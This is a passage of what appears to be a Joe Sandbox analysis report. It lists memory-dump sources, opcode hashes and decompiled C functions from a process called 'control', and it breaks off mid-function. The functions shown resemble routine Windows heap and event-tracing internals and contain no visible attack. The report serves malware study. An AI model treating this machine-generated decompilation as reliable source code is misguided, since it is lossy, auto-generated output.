              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eee5800505374b22415f59ba8096ff3abfbfe18237d04dc699bd385ec29b76fc
              • Instruction ID: 7da173508261f93142cda33eb21679024d09a93c517453d971d0602295edeca9
              • Opcode Fuzzy Hash: eee5800505374b22415f59ba8096ff3abfbfe18237d04dc699bd385ec29b76fc
              • Instruction Fuzzy Hash: A801A4B26056049FF3199F24D880B2177A9EB85729F2540AAE5059B791D774FC41CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C5C450 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              C-Code - Quality: 46%
              			E04C5C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04C09910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04C095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04C095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04C095D0();
				return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






              0x04c5c458
              0x04c5c45d
              0x04c5c466
              0x04c5c468
              0x04c5c469
              0x04c5c46a
              0x04c5c46b
              0x04c5c46e
              0x04c5c46f
              0x04c5c471
              0x04c5c476
              0x04c5c476
              0x04c5c47c
              0x04c5c47e
              0x04c5c480
              0x04c5c480
              0x04c5c483
              0x04c5c484
              0x04c5c486
              0x04c5c488
              0x04c5c48f
              0x04c5c491
              0x04c5c493
              0x04c5c493
              0x04c5c48f
              0x04c5c498
              0x04c5c49e
              0x04c5c4ad
              0x04c5c4ad
              0x04c5c4b2
              0x04c5c4b4
              0x04c5c4cd

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction ID: 0be757e676a055e717c2c1d7e78f9787bca05e5ff3f03aab64a3a374ab3ec6ab
              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction Fuzzy Hash: C60180B2140605BFEA25AF66CC80E76BB6EFB54794F008525F514425B0CB31FCA1DAA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C94015 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E04C94015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04BE2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04BE2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4cb86ac);
					E04BCF900(0x4cb86d4, _t28);
					E04BDFFB0(0x4cb86ac, _t28, 0x4cb86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04BDFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







              0x04c9401a
              0x04c9401e
              0x04c94023
              0x04c94028
              0x04c94029
              0x04c9402b
              0x04c9402f
              0x04c94043
              0x04c94046
              0x04c94051
              0x04c94057
              0x04c9405f
              0x04c94062
              0x04c94067
              0x04c9406f
              0x04c9407c
              0x04c9407c
              0x04c9408c
              0x04c9408c
              0x04c94097

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a2b005491c21de8baf335714d3c875891c0ca1e5a94c6f345bae5728f615e99c
              • Instruction ID: cb6ce3867acd6e17a42e7021b893b12032ccfedf3342be14d1cfdfc2e904edfa
              • Opcode Fuzzy Hash: a2b005491c21de8baf335714d3c875891c0ca1e5a94c6f345bae5728f615e99c
              • Instruction Fuzzy Hash: F101D4722015447FE618AB69CD80E23B7ACEB85658B0006A5B50887A11DB24FC11C6E4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C814FB Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              C-Code - Quality: 61%
              			E04C814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4cbd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04C0FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04BE7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















              0x04c814fb
              0x04c814fb
              0x04c8150a
              0x04c81514
              0x04c81519
              0x04c8151b
              0x04c81526
              0x04c8152c
              0x04c81534
              0x04c81537
              0x04c8153a
              0x04c81545
              0x04c81557
              0x04c81547
              0x04c81550
              0x04c81550
              0x04c81562
              0x04c81563
              0x04c81565
              0x04c8156a
              0x04c8157f

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f554dbd07edb01d05376ee47cf85f57b4225025b34b044d3739c968a09757cb5
              • Instruction ID: a215b01e898e7d3b04b163a5cae4abe44ad4d34ccafeac6a44010c69ecb13b81
              • Opcode Fuzzy Hash: f554dbd07edb01d05376ee47cf85f57b4225025b34b044d3739c968a09757cb5
              • Instruction Fuzzy Hash: F7019271A00248AFDB14EFA9D841FAEB7B8EF44714F04406AF905EB280DA74EE01DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C8138A Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              C-Code - Quality: 61%
              			E04C8138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4cbd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04C0FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04BE7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















              0x04c8138a
              0x04c8138a
              0x04c81399
              0x04c813a3
              0x04c813a8
              0x04c813aa
              0x04c813b5
              0x04c813bb
              0x04c813c3
              0x04c813c6
              0x04c813c9
              0x04c813d4
              0x04c813e6
              0x04c813d6
              0x04c813df
              0x04c813df
              0x04c813f1
              0x04c813f2
              0x04c813f4
              0x04c813f9
              0x04c8140e

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57a76d38d0f290d919502e9a10e3b978e309bb4ad1709d6f00c8abc25f1f9829
              • Instruction ID: bac36906251a5539f93ff081d81b019f7b059620a518e2a9fd2617383c4696af
              • Opcode Fuzzy Hash: 57a76d38d0f290d919502e9a10e3b978e309bb4ad1709d6f00c8abc25f1f9829
              • Instruction Fuzzy Hash: CC015271A00218AFDB14EFA9D841FAEB7B8EF44714F04406AB905EB281EA74EE41D794
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BDB02A Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BDB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04BE7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04C47016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







              0x04bdb037
              0x04bdb039
              0x04bdb03b
              0x04bdb040
              0x04c2a60e
              0x00000000
              0x00000000
              0x04c2a61d
              0x04bdb04b
              0x04bdb04e
              0x04c2a627
              0x04c2a634
              0x00000000
              0x00000000
              0x04c2a641
              0x04c2a653
              0x04c2a643
              0x04c2a64c
              0x04c2a64c
              0x04c2a65b
              0x00000000
              0x00000000
              0x00000000
              0x04c2a66c
              0x04bdb057
              0x04bdb057
              0x04bdb057
              0x04bdb046
              0x04bdb046
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction ID: c2ddaf281e5f54bac4dd7c3bd6b2d082e58660d155a7fab23eec8d558c6b0049
              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction Fuzzy Hash: FA01BC72205980DFD326CB2DCA88F667BD9EB41B40F0A00E1E919CBA51EB69FD40C220
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C91074 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04C91074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04C9165E(__ebx, 0x4cb8ae4, (__edx -  *0x4cb8b04 >> 0x14) + (__edx -  *0x4cb8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4cb8b04 >> 0x14) + (__edx -  *0x4cb8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04C8AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04BE7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04C7FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











              0x04c91074
              0x04c91080
              0x04c91082
              0x04c9108a
              0x04c9108f
              0x04c91093
              0x04c910ab
              0x04c910ab
              0x04c910c3
              0x04c910cf
              0x04c910e1
              0x04c910d1
              0x04c910da
              0x04c910da
              0x04c910e9
              0x04c910f5
              0x04c910f5
              0x04c910fe

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56b66b34db854d916896810211972007854e206518e542ca5c2ce272c1e6fa18
              • Instruction ID: ae5ff646306961cca1a20276fbb8d536482c1cb023bf332c64d90e7b4691f379
              • Opcode Fuzzy Hash: 56b66b34db854d916896810211972007854e206518e542ca5c2ce272c1e6fa18
              • Instruction Fuzzy Hash: 4D012872504742BBEB10EF29C945B1A77DAAB84314F088529F88583290EE31FD50DBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C7FEC0 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E04C7FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4cbd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04C0FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04BE7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















              0x04c7fec0
              0x04c7fec0
              0x04c7fecf
              0x04c7fed9
              0x04c7fede
              0x04c7fee0
              0x04c7feeb
              0x04c7fef3
              0x04c7fef6
              0x04c7fef9
              0x04c7ff04
              0x04c7ff16
              0x04c7ff06
              0x04c7ff0f
              0x04c7ff0f
              0x04c7ff21
              0x04c7ff22
              0x04c7ff24
              0x04c7ff29
              0x04c7ff3e

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1d9de5ab96515d3ba96d9115947d1ae74e296a9adc37bdf9227ffa426069b51
              • Instruction ID: be4b67dd680cc6458c270da72aa836f8f010d79fb450069e81c2e912e0069707
              • Opcode Fuzzy Hash: d1d9de5ab96515d3ba96d9115947d1ae74e296a9adc37bdf9227ffa426069b51
              • Instruction Fuzzy Hash: 44018471E00208ABDB14DBA9D845FAEB7B9EF44714F00406AF901AB281EA74EA01C794
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C7FE3F Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E04C7FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4cbd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04C0FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04BE7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















              0x04c7fe3f
              0x04c7fe3f
              0x04c7fe4e
              0x04c7fe58
              0x04c7fe5d
              0x04c7fe5f
              0x04c7fe6a
              0x04c7fe72
              0x04c7fe75
              0x04c7fe78
              0x04c7fe83
              0x04c7fe95
              0x04c7fe85
              0x04c7fe8e
              0x04c7fe8e
              0x04c7fea0
              0x04c7fea1
              0x04c7fea3
              0x04c7fea8
              0x04c7febd

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97bab2530643f5c63a3b27c1b41d5333b5cacbfdebea0832aba0306fa1f2273b
              • Instruction ID: 9e20745d4caf1b8c0852277339cc3d9f704ab3e83cb8ccb0cc2b151e90ac8340
              • Opcode Fuzzy Hash: 97bab2530643f5c63a3b27c1b41d5333b5cacbfdebea0832aba0306fa1f2273b
              • Instruction Fuzzy Hash: 14018471E00208ABDB14DFA9D845FAEBBB9EF44714F00806AF900AB281DA74EA01C795
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C98ED6 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E04C98ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4cbd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04BE7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















              0x04c98ed6
              0x04c98ee5
              0x04c98eed
              0x04c98ef0
              0x04c98efa
              0x04c98f03
              0x04c98f0c
              0x04c98f15
              0x04c98f24
              0x04c98f27
              0x04c98f31
              0x04c98f43
              0x04c98f33
              0x04c98f3c
              0x04c98f3c
              0x04c98f4e
              0x04c98f4f
              0x04c98f51
              0x04c98f56
              0x04c98f69

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a088fe30d6c40971c5f5c2c01f7f32cab147c4175cead840222769de544f0fa3
              • Instruction ID: 29dc5565093181e87fca85763012d11374fbcb38c914a54f3d82793b39672d0b
              • Opcode Fuzzy Hash: a088fe30d6c40971c5f5c2c01f7f32cab147c4175cead840222769de544f0fa3
              • Instruction Fuzzy Hash: 7D110C70A002099FDB04DFA9D445BAEB7F4FB08300F0482AAE519EB382E634A940DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C98A62 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E04C98A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4cbd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04BE7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04C0B640(E04C09AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















              0x04c98a62
              0x04c98a71
              0x04c98a79
              0x04c98a82
              0x04c98a85
              0x04c98a89
              0x04c98a8c
              0x04c98a8f
              0x04c98a92
              0x04c98a95
              0x04c98a9f
              0x04c98ab1
              0x04c98aa1
              0x04c98aaa
              0x04c98aaa
              0x04c98abc
              0x04c98abd
              0x04c98abf
              0x04c98ac4
              0x04c98ada

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ce24fb55f45ca5bcd4289882205f5943a1dfd32e1048aaa0eb886b3b53e838df
              • Instruction ID: befb264b7dbdb577a5d4948494c3d7c6966105ce0e641a47c5ca06fe942c03a4
              • Opcode Fuzzy Hash: ce24fb55f45ca5bcd4289882205f5943a1dfd32e1048aaa0eb886b3b53e838df
              • Instruction Fuzzy Hash: B10121B1A0021CAFDB04DFA9D9459AEB7F8EF49710F10406AF905E7341EB34AD00CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCDB60 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BCDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04BCDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04BCE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04BCE8B0(__ecx, _t14, 0xfff);
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







              0x04bcdb64
              0x04bcdb66
              0x04bcdb6b
              0x04bcdbaa
              0x04bcdb71
              0x04bcdb76
              0x04bcdb7a
              0x04bcdba3
              0x04bcdb7c
              0x04bcdb87
              0x04bcdb8b
              0x04c24fa1
              0x04c24fb3
              0x04c24fb8
              0x04bcdb91
              0x04bcdb96
              0x04bcdb98
              0x04bcdb98
              0x04bcdb8b
              0x04bcdb7a
              0x04bcdb9d
              0x04bcdba2

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction ID: c8cfabea92a81881647aa0781a8657a90a7f9343cca9639bbb5a9da65f663e2b
              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction Fuzzy Hash: C3F096373416229FE7726B5588C4F6BB6ADDFC1A64F1600BEF1099B344CE60EC0296E5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCB1E1 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BCB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04BE7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04BE7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
